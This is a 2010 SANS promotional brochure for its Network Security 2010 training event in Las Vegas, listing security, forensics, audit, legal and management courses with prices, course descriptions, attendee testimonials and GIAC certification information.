
SANS Network Security 2010
Las Vegas, September 19-29, 2010
At Caesar's Palace

THE MOST TRUSTED NAME IN INFORMATION AND SOFTWARE SECURITY
Hands-on immersion training programs taught by the world's highest-rated instructors!

Register using this Promo Code and receive a special invitation to the SANS Hosted Presidential Reception.

Save $400 when you register for SANS NS2010 by August 11, 2010: www.sans.org/network-security-2010

Featured courses:
Security Essentials Bootcamp Style
Hacker Techniques, Exploits & Incident Handling
Network Penetration Testing & Ethical Hacking
Computer Forensic Investigations & Incident Response
Security Leadership Essentials for Managers
+S™ Training Program for the CISSP® Cert Exam
Auditing Networks, Perimeters & Systems
Intrusion Detection In-Depth
Web App Penetration Testing and Ethical Hacking
...and more than 30 other courses in network and software security, forensics, legal, management, and IT audit.

SANS WhatWorks in Legal Issues and PCI Compliance in Information Security Summit is being held in conjunction with Network Security 2010 – Sept 22 - 29. www.sans.org/pci-legal-info-tech-summit-2010

SANS is the most trusted and by far the largest source for information security training, certification, and research in the world.
Setting the Standard for Security Training

SANS, 8120 Woodmont Avenue, Suite 205, Bethesda, MD 20814
PRSRT STD U.S. POSTAGE PAID

Here is what a few of last year's attendees had to say:
"Getting hands-on experience with the latest tools and having fun learning gives SANS an edge no other training organization has yet mastered." -JASON FOWLER, UBC
"Again, SANS has managed to take incredibly complicated material and make it easy to understand" -MARC STOUFER, MEIJER
"I like the fact that this course contained no fluff. All the information was of benefit and no time was wasted" -AMALIA DOMINGUEZ, NV ENERGY
"No other training has provided such instant value to me as a professional and to my company." -TERRY PACK, WELLPOINT

Dear Colleague,

Please join us for SANS Network Security 2010 at Caesars Palace in Las Vegas, September 19-29, where SANS will provide your best training in the industry today* from the Security, Forensics, Management, Audit, and Legal curricula.

At SANS Network Security 2010, you'll get valuable immersion training from our top SANS instructors and learn skills and tools for dealing with the cyber threats you face daily. SANS Network Security 2010 offers a high-energy program with world-class instructors, a huge Vendor Solutions Expo, hands-on labs, evening talks and a myriad of networking opportunities to expand your peer group and exchange challenges and solutions.

SANS continues to offer the newest and most relevant courses to meet your needs. As you review this brochure, be aware that not only can you select a job-based, full course for complete immersion training, but you can also select a short, skill-based course of a day or two either before or after to maximize your training investment. Course topics include Implementing and Auditing the Twenty Critical Security Controls – In Depth, Virtualization Security Fundamentals, and much, much more! Many of the hottest new courses are selling out, so register today!

Networking is a hidden jewel at Network Security 2010! Where else will you meet others in your field or in your role who deal with the same exploits and challenges you do? Several networking opportunities are available at SANS Network Security 2010. Along with your course, you can attend the SANS@Night presentations, evening talks with keynote speakers like Lenny Zeltser and Jason Fossen, and our Vendor events. SANS Network Security 2010 Vendor Expo provides a look at solutions and vendor products that can help address your organization's key security issues. In addition, we will be featuring Lunch & Learn sessions and Cocktail Briefs throughout this event so take advantage of these great networking opportunities.

Enhance your learning by attending the Legal Issues & PCI Compliance in Information Security Summit 2010 being held in conjunction with Network Security 2010.

The information technology industry changes daily, and the challenges you face are undoubtedly complex. If you know any key stakeholders in the security of your organization, take them to Las Vegas this fall. They'll be glad they came!

It is our goal to help you get the most out of your SANS Network Security 2010 experience. If you have suggestions on how we can better help you find the information you need, then I would love to hear from you, stephen@sans.edu.

See you in Las Vegas!

Kind regards,
Stephen Northcutt
President, The SANS Technology Institute, a postgraduate computer security college

Register at www.sans.org/network-security-2010
*Based on SC Magazine's Best Professional Training Program Award 2010

When you register, be sure to use the promo code on the back of this brochure. Those who do will receive a special invitation to the SANS Presidential Reception.

Five Tips to Get Approval for SANS Training

1. EXPLORE
• Read this brochure and note the courses that will enhance your role at your organization.
• Use the Roadmap to arm yourself with all the necessary materials to make a good case for attending a SANS training event.
• Note that the core, job-based courses can be complemented by short, skill-based courses of one or two days. We also offer deep discounts for bundled course packages. Consider a GIAC Certification, which will show the world that you have achieved proven expertise in your chosen field.

2. RELATE
• Show how recent problems or issues will be solved with the knowledge you gain from the SANS course.
• Promise to share what you've learned with your colleagues.

3. SAVE
• The earlier you sign up, the more you save, so explain the benefit of signing up early.
• Save even more with group discounts! See inside for details.

4. ADD VALUE
• Share with your boss that you can add value to your experience by meeting with network security experts - people who face the same type of challenges that you face every single day.
• Explain how you will be able to get and share great ideas on improving your IT productivity and efficiency.
• Enhance your SANS training experience with SANS@Night talks and the Vendor Expo, which are free and only available at live training events.
• Take advantage of the special SANS host hotel rate so you will be right where the action is!

5. ACT
• With the fortitude and initiative you have demonstrated thus far, you can confidently seek approval to attend SANS training!

Return on Investment: SANS training events are recognized as the best place in the world to get information security education. With SANS, you will gain significant return on investment (ROI) for your InfoSec investment. Through our intensive immersion classes, our training is designed to help your staff master the practical steps necessary for defending systems and networks against the most dangerous threats – the ones being actively exploited. Remember: SANS is your first and best choice for information and software security training. The SANS Promise is "You will be able to apply our information security training the day you get back to the office!"
SANS TRAINING AND YOUR CAREER ROADMAP

SECURITY CURRICULUM

Beginners
SEC301 Intro to Information Security (GISF) PG 21
NOTE: If you have experience in the field, please consider our more advanced course – SEC401.

Foundation
SEC401 SANS Security Essentials Bootcamp Style (GSEC) PG 44

Incident Handling
SEC501 Advanced Security Essentials – Enterprise Defender (GCED) PG 46
SEC504 Hacker Techniques, Exploits, and Incident Handling (GCIH) PG 52
FOR508 Computer Forensic Investigations and Incident Response (GCFA) PG 28
Additional Incident Handling Courses:
SEC517: Cutting-Edge Hacking Techniques
SEC550: Information Reconnaissance: Competitive Intelligence and Online Privacy PG 18
SEC577: Virtualization Security Fundamentals PG 19

Intrusion Analysis
SEC501 Advanced Security Essentials – Enterprise Defender (GCED) PG 46
SEC502 Perimeter Protection In-Depth (GCFW) PG 48
SEC503 Intrusion Detection In-Depth (GCIA) PG 50

Penetration Testing
SEC540 VoIP Security
SEC542 Web App Pen Testing and Ethical Hacking (GWAPT) PG 60
SEC560 Network Pen Testing and Ethical Hacking (GPEN) PG 62
SEC617 Wireless Ethical Hacking, Pen Testing, and Defenses (GAWN) PG 64
SEC709 Developing Exploits for Penetration Testers and Security Researchers PG 66
Additional Penetration Testing Courses:
DEV538: Web App Pen Testing Immersion
SEC561: Network Penetration Testing: Maximizing the Effectiveness of Reports, Exploits, and Command Shells
SEC567: Power Packet Crafting with Scapy PG 18
SEC580: Metasploit Kung Fu for Enterprise Pen Testing PG 19

System Administration
SEC501 Advanced Security Essentials – Enterprise Defender (GCED) PG 46
SEC505 Securing Windows (GCWN) PG 54
SEC506 Securing Linux/Unix (GCUX) PG 56
SEC509 Securing Oracle PG 58
Additional System Administration Courses:
SEC531: Windows Command-Line Kung Fu
SEC546: IPv6 Essentials PG 18
SEC556: Comprehensive Packet Analysis PG 18
SEC564: Hacker Detection for System Administrators PG 19

Network and Application Security
SEC501 Advanced Security Essentials – Enterprise Defender (GCED) PG 46
Additional Network and Application Security Courses:
SEC434: Log Management In-Depth
SEC440: 20 Critical Security Controls: Planning, Implementing, and Auditing
SEC565: Data Leakage Prevention - In Depth PG 17
SEC566: Implementing & Auditing the Twenty Critical Security Controls - In-Depth PG 20

FORENSICS CURRICULUM
FOR408 Computer Forensic Essentials PG 26
FOR508 Computer Forensic Investigations and Incident Response (GCFA) PG 28
FOR558 Network Forensics PG 30
FOR563 Mobile Device Forensics PG 32
FOR610 REM: Malware Analysis Tools & Techniques (GREM) PG 34
Additional Forensics Courses:
FOR526: Advanced Filesystem Recovery and Memory Forensics PG 17

APPLICATION SECURITY CURRICULUM
Design & Test (foundation: SEC301 Intro to Information Security (GISF) PG 21)
DEV522 Defending Web Applications Security Essentials PG 22
SEC542 Web App Pen Testing and Ethical Hacking (GWAPT) PG 60
Secure Coding (foundation: SEC401 SANS Security Essentials Bootcamp Style (GSEC) PG 44)
DEV530 Essential Secure Coding in Java/JEE
DEV543 Secure Coding in C & C++
DEV541 Secure Coding in Java/JEE (GSSP-JAVA) PG 15
DEV544 Secure Coding in .NET (GSSP-.NET)
DEV545 Secure Coding in PHP (GSSP-PHP)
Code Review
DEV534 Secure Code Review for Java Web Apps
Additional Secure Coding Courses:
DEV304: Software Security Awareness
DEV536: Secure Coding for PCI Compliance

AUDIT CURRICULUM
SEC301 Intro to Information Security (GISF) PG 21
AUD507 Auditing Networks, Perimeters, and Systems (GSNA) PG 24
Additional Audit Courses:
AUD305: Technical Communication & Presentation Skills
AUD423: Training for the ISACA® CISA® Cert Exam
AUD429: IT Security Audit Essentials Bootcamp
AUD521: Meeting the Minimum: PCI/DSS 1.2: Becoming and Staying Compliant PG 12
SEC440: 20 Critical Security Controls: Planning, Implementing, and Auditing
SEC566: Implementing & Auditing the Twenty Critical Security Controls - In-Depth PG 20

LEGAL CURRICULUM
SEC301 Intro to Information Security (GISF) PG 21
LEG523 Legal Issues in Information Technology and Information Security (GLEG) PG 13

MANAGEMENT CURRICULUM
SEC301 Intro to Information Security (GISF) PG 21
SEC401 SANS Security Essentials Bootcamp Style (GSEC) PG 44
MGT512 SANS Security Leadership Essentials For Managers with Knowledge Compression™ (GSLC) PG 40
MGT414 SANS® +S™ Training Program for the CISSP® Certification Exam (GISP) PG 38
MGT525 Project Management and Effective Communications for Security Professionals and Managers (GCPM) PG 42
Additional Management Courses:
MGT305: Technical Communication and Presentation Skills PG 15
MGT404: Fundamentals of Information Security Policy PG 16
MGT421: SANS Leadership and Management Competencies PG 16
MGT432: Information Security for Business Executives
MGT438: How to Establish a Security Awareness Program
MGT570: Social Engineering Defense PG 16

GIAC certification available for courses indicated with GIAC acronyms.

SANS Network Security 2010 Registration Fees
Register online at www.sans.org/network-security-2010
NOTE: If you don't wish to register online, please call 301-654-SANS(7267) 9:00am - 8:00pm (Mon-Fri) EST and we will fax or mail you an order form.

Job-Based Long Courses
Prices are listed as: Paid by 8/11/10 / Paid by 8/25/10 / Paid after 8/25/10, followed by the add-on prices where offered (Add GIAC Cert $499, Add OnDemand $399).
AUD507 Auditing Networks, Perimeters, and Systems: $3,445 / $3,595 / $3,845; GIAC Cert $499; OnDemand $399
DEV522 Defending Web Applications Security Essentials: $3,445 / $3,595 / $3,845
FOR408 Computer Forensic Essentials: $3,915 / $4,065 / $4,315; OnDemand $399
FOR508 Computer Forensic Investigations and Incident Response: $3,645 / $3,795 / $4,045; GIAC Cert $499; OnDemand $399
FOR558 Network Forensics: $3,445 / $3,595 / $3,845
FOR563 Mobile Device Forensics: $3,625 / $3,775 / $4,025
FOR610 Reverse-Engineering Malware: Malware Analysis Tools and Techniques: $2,745 / $2,895 / $3,145; GIAC Cert $499; OnDemand $399
LEG523 Legal Issues in Information Technology and Information Security: $3,025 / $3,175 / $3,425; GIAC Cert $499; OnDemand $399
MGT414 SANS® +S™ Training Program for the CISSP® Certification Exam: $3,445 / $3,595 / $3,845; GIAC Cert $499; OnDemand $399
MGT512 SANS Security Leadership Essentials For Managers with Knowledge Compression™: $3,895 / $4,045 / $4,295; GIAC Cert $499; OnDemand $399
MGT525 Project Management & Effective Communications for Security Professionals & Managers: $3,445 / $3,595 / $3,845; GIAC Cert $499
SEC301 Intro to Information Security: $3,025 / $3,175 / $3,425; GIAC Cert $499; OnDemand $399
SEC401 SANS Security Essentials Bootcamp Style: $3,645 / $3,795 / $4,045; GIAC Cert $499; OnDemand $399
SEC501 Advanced Security Essentials – Enterprise Defender: $3,545 / $3,695 / $3,945; GIAC Cert $499; OnDemand $399
SEC502 Perimeter Protection In-Depth: $3,495 / $3,645 / $3,895; GIAC Cert $499; OnDemand $399
SEC503 Intrusion Detection In-Depth: $3,545 / $3,695 / $3,945; GIAC Cert $499; OnDemand $399
SEC504 Hacker Techniques, Exploits, and Incident Handling: $3,545 / $3,695 / $3,945; GIAC Cert $499; OnDemand $399
SEC505 Securing Windows: $3,495 / $3,645 / $3,895; GIAC Cert $499; OnDemand $399
SEC506 Securing Linux/Unix: $3,495 / $3,645 / $3,895; GIAC Cert $499; OnDemand $399
SEC509 Securing Oracle: $3,595 / $3,745 / $3,995; OnDemand $399
SEC542 Web Application Penetration Testing and Ethical Hacking: $3,445 / $3,595 / $3,845; GIAC Cert $499; OnDemand $399
SEC560 Network Penetration Testing and Ethical Hacking: $3,895 / $4,045 / $4,295; GIAC Cert $499; OnDemand $399
SEC566 Implementing & Auditing the Twenty Critical Security Controls - In-Depth: $3,025 / $3,175 / $3,425
SEC617 Wireless Ethical Hacking, Penetration Testing, and Defenses: $3,595 / $3,745 / $3,995; GIAC Cert $499; OnDemand $399
SEC709 Developing Exploits for Penetration Testers and Security Researchers: $3,745 / $3,895 / $4,145
HOSTED Drive and Data Recovery Forensics: $3,625 / $3,775 / $4,025
HOSTED (ISC)2® Certified Secure Software Lifecycle Professional (CSSLP) CBK® Education Program: $2,745 / $2,895 / $3,145

Skill-Based Short Courses
Prices are listed as: If taking a 5-6 day course / Paid by 8/11/10 / Paid by 8/25/10 / Paid after 8/25/10, followed by the add-on prices where offered.
DEV541 Secure Coding in Java/JEE: Developing Defensible Applications: N/A / $2,645 / $2,795 / $3,045; GIAC Cert $499; OnDemand $399
FOR526 Advanced Filesystem Recovery and Memory Forensics: $575 / $995 / $995 / $995; OnDemand $99
MGT305 Technical Communication and Presentation Skills for Security Professionals: $855 / $1,275 / $1,275 / $1,275
MGT404 Fundamentals of Information Security Policy: $855 / $1,275 / $1,275 / $1,275; OnDemand $99
MGT421 SANS Leadership and Management Competencies: $675 / $1,095 / $1,095 / $1,095; OnDemand $99
MGT570 Social Engineering Defense: $1,150 / $1,700 / $1,700 / $1,700
SEC546 IPv6 Essentials: $575 / $995 / $995 / $995
SEC550 Information Reconnaissance: Competitive Intelligence and Online Privacy: $575 / $995 / $995 / $995; OnDemand $99
SEC556 Comprehensive Packet Analysis: $575 / $995 / $995 / $995; OnDemand $99
SEC564 Hacker Detection for System Administrators: $1,150 / $1,700 / $1,700 / $1,700
SEC565 Data Leakage Prevention – In Depth: N/A / $2,645 / $2,795 / $3,045
SEC567 Power Packet Crafting with Scapy: $575 / $995 / $995 / $995
SEC577 Virtualization Security Fundamentals: $1,250 / $1,800 / $1,800 / $1,800
SEC580 Metasploit Kung Fu for Enterprise Pen Testing: $1,150 / $1,700 / $1,700 / $1,700

Individual Courses Available (MON 9/20 through SAT 9/25)
AUD507: 507.1, 507.2 & 507.3, 507.4, 507.5, 507.6
LEG523: 523.1, 523.2, 523.3, 523.4, 523.5
SEC301: 301.1, 301.2, 301.3, 301.4, 301.5
SEC401: 401.1, 401.2, 401.3, 401.4, 401.5, 401.6
SEC501: 501.1, 501.2, 501.3, 501.4, 501.5, 501.6
SEC503: 503.1
SEC504: 504.1
SEC505: 505.1, 505.2, 505.3, 505.4, 505.5, 505.6
SEC506: 506.1, 506.2, 506.3, 506.4, 506.5, 506.6

Individual Course Day Rates If Not Taking a Full Course
Prices are listed as: Paid by 8/11/10 / Paid by 8/25/10 / Paid after 8/25/10.
One Full Day: $1,325 / $1,325 / $1,325
Two Full Days: $2,050 / $2,050 / $2,050
Three Full Days: $3,000 / $3,000 / $3,000
Four Full Days: $3,250 / $3,250 / $3,250
Five Full Days: $3,800 / $3,800 / $3,800
Six Full Days: $4,350 / $4,350 / $4,350
Seven Full Days: $4,950 / $4,950 / $4,950
Eight Full Days: $5,550 / $5,550 / $5,550

REMINDER: When you register, please use the promo code located on the back cover.
Courses-at-a-Glance
Event days: SUN 9/19, MON 9/20, TUE 9/21, WED 9/22, THU 9/23, FRI 9/24, SAT 9/25, SUN 9/26, MON 9/27, TUE 9/28, WED 9/29

AUD507 Auditing Networks, Perimeters, and Systems . . . PAGE 24
DEV522 Defending Web Applications Security Essentials . . . PAGE 22
DEV541 Secure Coding in Java/JEE: Developing Defensible Applications . . . PAGE 15
FOR408 Computer Forensic Essentials . . . PAGE 26
FOR508 Computer Forensic Investigations and Incident Response . . . PAGE 28
FOR526 Advanced Filesystem Recovery and Memory Forensics . . . PAGE 17
FOR558 Network Forensics . . . PAGE 30
FOR563 Mobile Device Forensics . . . PAGE 32
FOR610 REM: Malware Analysis Tools and Techniques . . . PAGE 34
HOSTED Drive and Data Recovery Forensics . . . PAGE 36
MGT305 Technical Communication and Presentation Skills for Security Professionals . . . PAGE 15
MGT404 Fundamentals of Information Security Policy . . . PAGE 16
MGT414 SANS® +S™ Training Program for the CISSP® Certification Exam . . . PAGE 38
MGT421 SANS Leadership and Management Competencies . . . PAGE 16
MGT512 SANS Security Leadership Essentials for Managers with Knowledge Compression™ . . . PAGE 40
MGT525 Project Management and Effective Communications for Security Professionals and Managers . . . PAGE 42
MGT570 Social Engineering Defense . . . PAGE 16
SEC301 Intro to Information Security . . . PAGE 21
SEC401 SANS Security Essentials Bootcamp Style . . . PAGE 44
SEC501 Advanced Security Essentials – Enterprise Defender . . . PAGE 46
SEC502 Perimeter Protection In-Depth . . . PAGE 48
SEC503 Intrusion Detection In-Depth . . . PAGE 50
SEC504 Hacker Techniques, Exploits, and Incident Handling . . . PAGE 52
SEC505 Securing Windows . . . PAGE 54
SEC506 Securing Linux/Unix . . . PAGE 56
SEC509 Securing Oracle . . . PAGE 58
SEC542 Web App Penetration Testing and Ethical Hacking . . . PAGE 60
SEC546 IPv6 Essentials . . . PAGE 18
SEC550 Information Reconnaissance: Competitive Intelligence and Online Privacy . . . PAGE 18
SEC556 Comprehensive Packet Analysis . . . PAGE 18
SEC560 Network Penetration Testing and Ethical Hacking . . . PAGE 62
SEC564 Hacker Detection for System Administrators . . . PAGE 19
SEC565 Data Leakage Prevention - In Depth . . . PAGE 17
SEC566 Implementing & Auditing the 20 Critical Security Controls - In-Depth . . . PAGE 20
SEC567 Power Packet Crafting with Scapy . . . PAGE 18
SEC577 Virtualization Security Fundamentals . . . PAGE 19
SEC580 Metasploit Kung Fu for Enterprise Pen Testing . . . PAGE 19
SEC617 Wireless Ethical Hacking, Penetration Testing, and Defenses . . . PAGE 64
SEC709 Developing Exploits for Penetration Testers & Security Researchers . . . PAGE 66
HOSTED (ISC)2® Certified Secure Software Lifecycle Professional (CSSLP) CBK® Education Program . . . PAGE 68
SANS WhatWorks in Legal Issues & PCI in Information Security Summit 2010 . . . PAGE 12
LEG523 Legal Issues in Information Technology and Information Security . . . PAGE 13
AUD521 Meeting the Minimum: PCI/DSS 1.2: Becoming & Staying Compliant . . . PAGE 12

Please check the Web site for an up-to-date course list at www.sans.org/network-security-2010

Contents
Training and Your Career Roadmap . . . 2-5
Earn Your GIAC Certification . . . 6
DoD Directive 8570 Information . . . 7
Special / Vendor Events . . . 8-9
SANS Technology Institute . . . 10-11
Legal Issues & PCI Compliance in Information Security Summit . . . 12-13
SANS Cyber Guardian Program . . . 14
Future SANS Training Events . . . 69
Hotel and Travel Information . . . 70
Reasons to Come to Baltimore . . . 71
Registration Information . . . 72
Registration Fees . . . 73
SANS TRAINING AND YOUR CAREER ROADMAP

Just Starting a Career in Security and Need a Good Foundation?

SEC401: SANS Security Essentials Bootcamp Style (GSEC) Page 44
Maximize your training time and turbo-charge your career in security by learning the full SANS Security Essentials curriculum needed to qualify for the GSEC certification. In this course you will learn the language and underlying theory of computer security. At the same time you will learn the essential, up-to-the-minute knowledge and skills required for effective performance if you are given the responsibility for securing systems and/or organizations.
“Security 401 is a wonderfully comprehensive course for all IT professionals. There is something for everyone, and it is a great springboard for all of the other courses at SANS.” -ANDREA TODD

SEC501: Advanced Security Essentials – Enterprise Defender (GCED) Page 46
Cyber security continues to be a critical area for organizations and will continue to increase in importance as attacks become stealthier, have a greater financial impact on an organization, and cause reputational damage. Security 501 is a follow-on to Security 401 (with no overlap) and continues to focus on more technical areas that are needed to protect an organization.
“The course content is extensive and covers all the areas that are relevant for a security professional in today’s IT world. The instructor was great – very experienced and knowledgeable.” -KAYODE OLOKE, TORYS LLP

SEC301: Intro to Information Security (GISF) Page 21
SANS is the MIT of information security, and this introductory certification course is the fastest possible way to get up to speed. Understand the threats and risks to information resources, and identify generally accepted best practices.
“This fundamental course sets the groundwork for a successful future in IT security.” -BRIAN FRICKE, US NAVY/MSC

Need to Implement an Application Security Program?

NEW! DEV522: Defending Web Application Security Essentials Page 22
Defending Web applications is critical! Traditional network defenses, such as firewalls, fail to secure Web applications which have to be available to large user communities. The amount and importance of data entrusted to Web applications is growing, and defenders need to learn how to secure it. DEV522 covers the OWASP Top 10 and will help you to better understand Web application vulnerabilities, thus enabling you to properly defend your organization’s Web assets.
“While I understand the basic thoughts behind Web application security, this class gave me a greater breadth and depth of knowledge.” -MISS KOOS, MICHIGAN STATE UNIVERSITY

DEV541: Secure Coding in Java/JEE: Developing Defensible Applications (GSSP-JAVA) Page 15
This four-day course is a comprehensive course covering a huge set of skills and knowledge; it’s not a high-level theory course. It’s about real programming. In this course you will examine actual code, work with real tools, build applications, and gain confidence in the resources you need for the journey to improving security of Java applications.
“This class has made me think about data validation in ways that I had not thought of before.” -RICK STONE, UMPQUA BANK
www.sans-ssi.org

Want to Specialize in System Administration?

SEC505: Securing Windows (GCWN) Page 54
This program brings the confusing complexity of Windows security into clear focus by starting with foundational security services and advancing in a logical progression to particular products or features which rely on these foundations, such as IIS and IPSec. Securing Windows is fully updated for Windows Server 2008-R2 and Windows 7. Most of the content applies to Windows Server 2003 and XP too, but the focus is on 2008/Vista/7. Learn to implement the 20 Critical Controls relevant to Windows systems.
“The course introduced a wide range of technologies and issues I was completely unaware of – great exposure to new ideas. Jason’s depth of knowledge and examples are of great value.” -DAVID THORNBURG, SRC

Want to Advance Your Technical Skills?

SEC503: Intrusion Detection In-Depth (GCIA) Page 50
The emphasis of this course is on increasing students’ understanding of the workings of TCP/IP, methods of network traffic analysis, and one specific network intrusion detection system – Snort. This course is not a comparison or demonstration of multiple NIDS. Instead, the knowledge/information provided here allows students to better understand the qualities that go into a sound NIDS and the whys behind them, and thus be better equipped to make a wise selection for their site’s particular needs.
“There’s nothing that compares to the detail and real-world content in this course.” -JOHN DASKAL, LOCKHEED MARTIN

SEC504: Hacker Techniques, Exploits, and Incident Handling (GCIH) Page 52
Learn to detect malicious code and respond on the fly. You’ll learn how your networks appear to hackers, how they gain access with special emphasis on the newer attack vectors, and what they do when they get in – especially in manipulating the system to hide their work. Master the proven six-step process of incident handling so you are prepared to be the technical leader of the incident handling team.
“The information presented is scary good. Really makes you examine your current knowledge from new angles.” -KURT BENNETT, GENERAL DYNAMICS

Want to Specialize in Pen Testing?

SEC542: Web App Penetration Testing and Ethical Hacking (GWAPT) Page 60
Web applications are a major point of vulnerability in organizations today. Web app holes have resulted in the theft of millions of credit cards, major financial and reputational damage for hundreds of enterprises, and even the compromise of thousands of browsing machines that visited Web sites altered by attackers. In this class you’ll learn the art of exploiting Web applications so you can find flaws in your enterprise’s Web apps before the bad guys do.
“Never will you learn so much and have such a great time doing it. Kevin Johnson is an incredible teacher.” -TOM COOK, US ARMY

SEC617: Wireless Ethical Hacking, Penetration Testing, and Defenses (GAWN) Page 64
Few fields are as complex as wireless security. This course breaks down the issues and relevant standards that affect wireless network administrators, auditors, and information security professionals. With hands-on labs and instruction from industry wireless security experts, you will gain an intimate understanding of the risks threatening wireless networks. After identifying risks and attacks, we’ll present field-proven techniques for mitigating these risks, leveraging powerful open-source and commercial tools for Linux and Windows systems.
“This course is absolutely critical for any IT professional responsible for overseeing an existing wireless network.” -JOSHUA BROWN, FLEISHMAN HILLARD

SEC560: Network Penetration Testing and Ethical Hacking (GPEN) Page 62
Successful penetration testers don’t just throw a bunch of hacks against an organization and regurgitate the output of their tools. Instead, they need to understand how these tools work in depth and conduct their test in a careful, professional manner. This course explains the inner workings of numerous tools and their use in effective network penetration testing and ethical hacking projects.
“This course continually provides clear exercises that concisely demonstrate each concept without extra fluff.” -JASON MANSFIELD, ANONYMIZER, INC.

SEC709: Developing Exploits for Penetration Testers and Security Researchers Page 66
In this course we bridge the gaps and take a step-by-step look at Linux and Windows operating systems and how exploitation truly works under the hood. This five-day course rapidly progresses through exploitation techniques used to attack stacks, heaps, and other memory segments on Linux and Windows. This is a fast-paced course that provides you with the skills to hit the ground running with vulnerability research.
“As a software developer, it opened my mind to how vulnerable some of my code could be, and how to protect it in the future.” -JOHN CUTTER, SPAWAR

For detailed descriptions of all SANS courses, visit: www.sans.org
For GIAC Certification information, visit: www.giac.org
For SANS Technology Institute advanced degree information, visit: www.sans.edu
SANS Network Security 2010 • September 19 - 29, 2010
SANS TRAINING AND YOUR CAREER ROADMAP

Want to Specialize in Forensics?

FOR408: Computer Forensic Essentials Page 26
This course focuses on the essentials that a forensic investigator must know to investigate core computer crime incidents successfully. You will learn how computer forensic analysts focus on collecting and analyzing data from computer systems to track user-based activity that could be used internally or in civil/criminal litigation.
“This is an excellent hands-on course and with an awesome instructor who pays attention to the audience’s skills, teaching accordingly. I love this class!” -PHYLLIS HELLMAN, BOEING COMPANY
http://computer-forensics.sans.org

FOR508: Computer Forensic Investigations and Incident Response (GCFA) Page 28
Network equipment, such as Web proxies, firewalls, IDS, routers, and even switches, contains evidence that can make or break a case. You will learn how to recover evidence from network-based devices and use it to build your case. Each student will be given a virtual network to analyze and will have the opportunity to conduct forensic analysis on a variety of devices.
“Most in-depth course on digital forensics analysis available today. Goes beyond the basics and gets down to the nitty-gritty.” -ELISE FEETHAM

FOR563: Mobile Device Forensics Page 32
This hands-on course provides the core knowledge and skills that a digital forensic investigator needs to process cell phones, PDAs, and other mobile devices. Using state-of-the-art tools, you will learn how to forensically preserve, acquire, and examine data stored on mobile devices and utilize the results for internal investigations or in civil/criminal litigation.
“The manuals are some of the best I’ve seen. The instructor is extremely knowledgeable and experienced with mobile forensics and provides great insight to anyone in the forensic community. The class conversations and interactions make even the first day of this course more valuable than other courses I have attended. Great course!” -HEATHER MAHALIK, BASIS TECHNOLOGY

FOR558: Network Forensics Page 30
Network equipment such as Web proxies, firewalls, IDS, routers and even switches contain evidence that can make or break a case. You will learn how to recover evidence from network-based devices and use it to build your case. Each student will be given a virtual network to analyze and will have the opportunity to conduct forensic analysis on a variety of devices.
“This course is amazing. Not only are we covering an extensive range of topics, we are doing labwork for each topic so that we can be comfortable with the new material. Love the class! Thank you.” -DEBORAH GOSHORN, NAVAL POSTGRADUATE SCHOOL

FOR610: Reverse-Engineering Malware: Malware Analysis Tools and Techniques (GREM) Page 34
Expand your capacity to fight malicious code by learning how to analyze bots, worms, and trojans. This recently expanded, four-day course discusses practical approaches to examining malware using a variety of system monitoring utilities, a disassembler, a debugger, and other tools useful for reverse-engineering malicious software. You don’t have to be a full-time malware searcher to benefit from this course. As organizations increasingly rely on their staff to act as first responders during a security incident, malware analysis skills are becoming increasingly important.
“This course was valuable because it gives so many options and software tools to help you analyze malware. The instructor also made the information easy to comprehend even with my entry-level knowledge.” -KEITH HARGROVE, US ARMY

Want to Learn Security from a Management Perspective?

MGT414: SANS® +S™ Training Program for the CISSP® Certification Exam (GISP) Page 38
The SANS CISSP® review course will cover the security concepts needed in order to pass the CISSP® exam. This accelerated review course assumes the student has a basic understanding of networks and operating systems and focuses solely on the ten domains of knowledge as determined by (ISC)2. Each domain of knowledge is dissected into its critical components. Every component is discussed showing its relationship to each other and other areas of network security. This course also prepares you for the GISP certification. (Note: The CISSP® exam is NOT provided as part of the training.)
“Very valuable, as it not only teaches the material, it also teaches how to take the exam effectively.” -STEVE BRANT, NETT APP

MGT512: SANS Security Leadership Essentials for Managers with Knowledge Compression™ (GSLC) Page 40
This course is designed to empower senior and advancing managers who want to get up to speed fast on information security issues and terminology. Lecture sections are intense. The diligent manager will learn vital, up-to-date knowledge and skills required to supervise the security component of any information technology project. Only SANS’ top instructors are invited to teach this course.
“This course opens the door to a much deeper area of information needed to effectively manage the security of a network/application.” -MICHAEL GOLDAMMER, L-3 COM. GSI

MGT525: Project Management and Effective Communications for Security Professionals and Managers (GCPM) Page 42
This curriculum is intended to give you the knowledge and tools you need to become a top-notch project manager with a focus on effective communication, human resources, and quality management. The course covers all aspects of project management from planning and initiating projects to managing cost, time, and quality while your project is active and then completing, closing, and documenting after the project finishes. A copy of the Project Management Institute’s Guide to the Project Management Body of Knowledge (PMBOK® Guide) - Fourth Edition is provided to all participants.
“This course is spot on for security professionals. It covered project management skills from a security point of view.” -ANTWAN BANKS, US ARMY

Want to Advance Your Auditing Security Skills?

AUD507: Auditing Networks, Perimeters, and Systems (GSNA) Page 24
This course is the end product of over one hundred skilled system, network, and security administrators working with one common goal – to improve the state of information security. It is based on known and validated threats and vulnerabilities explained from real-world situations that can be used to raise awareness of why auditing is important. From these threats and vulnerabilities we build countermeasures and defenses, including instrumentation, metrics, and auditing.
“The instructor keeps the class interesting. Lots of material, all of it is useful. No Fluff!” -SANDY WARGO, US ARMY
http://it-audit.sans.org

Want to Learn Security from a Legal Perspective?

LEG523: Legal Issues in Information Technology and Information Security (GLEG) Page 13
Day by day, as legislation and lawsuits become more common, the law is assuming greater influence on IT security. This course will help the IT and legal departments better understand each other and find workable solutions to problems. Learn how to word a security policy so as to minimize liability if your enterprise is sued for losing customer data.
“This course provided tools to help me protect my company’s assets on the Internet in a noble and justifiable way I had never thought of before – great insights and great discussions.” -PAUL JACOBSEN, FLUOR HANFORD
EARN YOUR GIAC CERTIFICATION

The Only Hands-on Information Security Certification
www.giac.org

Ask us about how this ties to the SANS Cyber Guardian. Write to onsite@sans.org.

Top Four Reasons to ‘Get GIAC Certified’

1. Promotes hands-on technical skills and improves knowledge retention
“The GIAC certification process forced me to dig deeper into the information that I was taught in class. As a result of this, I integrated this training into my practical skill set and improved my hands-on skills.” -DEAN FARRINGTON, INFORMATION SECURITY ENGINEER, WELLS FARGO

2. Provides proof that you possess hands-on technical skills
“GIAC proves that I have a very solid technical background to support any challenge I deal with every day. There are so many new tools coming up daily, but the underlying background essentially remains the same.” -WAYNE HO, BUSINESS INFORMATION SECURITY OFFICER, GLOBAL BANK

3. Positions you to be promoted and earn respect among your peers
